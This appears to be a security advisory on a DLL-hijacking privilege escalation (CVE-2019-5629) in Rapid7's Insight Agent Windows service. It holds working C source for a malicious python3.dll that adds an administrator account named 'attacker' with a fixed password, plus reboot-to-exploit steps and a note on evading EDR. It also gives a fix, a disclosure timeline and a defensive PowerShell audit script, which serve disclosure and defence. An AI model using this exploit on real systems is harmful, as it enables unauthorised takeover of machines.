With Insight IDR, Rapid7 has created a very powerful, yet still easy to use, Incident Detection and Response toolkit. During one of my latest assignments I found its Windows agent installed on my client's systems.
While trying to disable it so that I could stay under the radar, I discovered a privilege escalation vulnerability in its Windows service. This vulnerability could be abused by any local user to gain full control over the affected system. It has been verified on a fully patched German Windows 10 x64 running Insight Agent v2.6.3.14. The issue has been fixed with version 2.6.5.
The underlying issue is that the ir_agent Windows service, which is automatically started on system boot and runs with SYSTEM privileges, tries to load the DLL C:\DLLs\python3.dll.
Although this path does not exist by default, it can be created by any local user. This is possible because the filesystem ACLs of the system drive allow anyone to create new subfolders.
With that knowledge, I created a new DLL that mimics the expected exports of the real python3.dll. However, instead of providing any of the expected functionality, it simply adds a new administrative user “attacker” to the system. You can download the full source here.
```c
/* Implement DllMain with common datatypes so we don't have to include
   windows.h. Otherwise this would cause several compile errors because of
   the already known but reexported functions. */
#include <stdlib.h>   /* system(), exit() */

/* Same layout as BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID);
   DWORD is an unsigned long, so no windows.h is needed. */
int DllMain(void* hinst, unsigned long reason, void* reserved)
{
    /* Marker file: proves the DLL was executed by the service at all. */
    system("cmd /c \"date >> C:\\this_should_not_work.txt\"");
    system("net user attacker Batman42 /add");
    system("net localgroup Administrators attacker /add");
    /* German Windows names the group "Administratoren". */
    system("net localgroup Administratoren attacker /add");
    exit(1);
    return 0;
}
```
...
After compiling it into a DLL, I saved it (deliberately using a standard user account) as C:\DLLs\python3.dll.
After a reboot, the DLL was loaded by the privileged Windows service ir_agent and the user attacker was created.
Proof of Concept
To confirm this issue yourself, install the Insight IDR Windows Agent v2.6.3.14 (the issue has been fixed with version 2.6.5) and download the precompiled version of the malicious exploit DLL.
After that, as a non-admin user, create the folder C:\DLLs and place the library python3.dll in it. Now simply reboot the system. After the reboot, the new admin user attacker will have been added. This proves that full SYSTEM-level access has been gained.
Suggested solution
All external dependencies should only be loaded from secure locations, i.e. from paths that unprivileged users can neither create nor write to.
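To check a host for the three preconditions described above (a drive root that lets ordinary users create subfolders, an already present C:\DLLs\python3.dll owned by an untrusted account, and the agent service running as SYSTEM), here is an added audit script that is not part of the original advisory and not Rapid7's code. It assumes the service is registered under the name ir_agent; the function name is my own.

```powershell
# Added example, not code from the original advisory or from Rapid7.
# Assumption: the agent service is registered as 'ir_agent'.
function Test-IrAgentDllHijackExposure {
    param(
        [string]$DllPath = 'C:\DLLs\python3.dll',
        [string]$ServiceName = 'ir_agent'
    )
    # Compare well-known SIDs instead of names so the check also works on
    # localized systems (the advisory was verified on a German Windows 10).
    $lowPrivSids  = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')  # Everyone, Authenticated Users, Users
    $trustedSids  = @('S-1-5-18', 'S-1-5-32-544')             # SYSTEM, Administrators
    $sidType      = [System.Security.Principal.SecurityIdentifier]
    $createDirBit = [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories

    $root = [System.IO.Path]::GetPathRoot($DllPath)   # C:\
    $dir  = Split-Path -Parent $DllPath               # C:\DLLs
    $r = [ordered]@{ DllPath = $DllPath }

    # 1. Can a low-privilege principal create subfolders in the drive root?
    #    FileSystemRights.CreateDirectories (== AppendData) is the relevant bit.
    $rootRules = (Get-Acl -LiteralPath $root).GetAccessRules($true, $true, $sidType)
    $r.RootAllowsUserSubfolders = @($rootRules | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($lowPrivSids -contains $_.IdentityReference.Value) -and
        ((([int]$_.FileSystemRights) -band $createDirBit) -ne 0)
    }).Count -gt 0

    # 2. Does the hijack path already exist, and who owns the DLL?
    $r.DirExists = Test-Path -LiteralPath $dir
    $r.DllExists = Test-Path -LiteralPath $DllPath
    $r.DllOwner  = $null
    $r.DllOwnedByUntrusted = $false
    if ($r.DllExists) {
        $acl = Get-Acl -LiteralPath $DllPath
        $r.DllOwner = $acl.Owner
        $r.DllOwnedByUntrusted = $trustedSids -notcontains $acl.GetOwner($sidType).Value
    }

    # 3. Is the agent service installed and running as LocalSystem?
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
    $r.ServicePresent  = $null -ne $svc
    $r.ServiceAccount  = if ($svc) { $svc.StartName } else { $null }
    $r.ServiceIsSystem = [bool]($svc -and $svc.StartName -eq 'LocalSystem')

    [pscustomobject]$r
}

Test-IrAgentDllHijackExposure | Format-List
```

Run it from an elevated prompt; RootAllowsUserSubfolders is true on a default Windows install, so the decisive findings are DllOwnedByUntrusted together with ServiceIsSystem on an agent older than 2.6.5.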
Timeline
- 22.5.2019: The issue has been identified, documented and reported
- 22.5.2019: The vulnerability has been confirmed by Rapid7
- 29.5.2019: Rapid7 released a new version (2.6.5) of the Insight agent that fixes this vulnerability. CVE-2019-5629 has been assigned.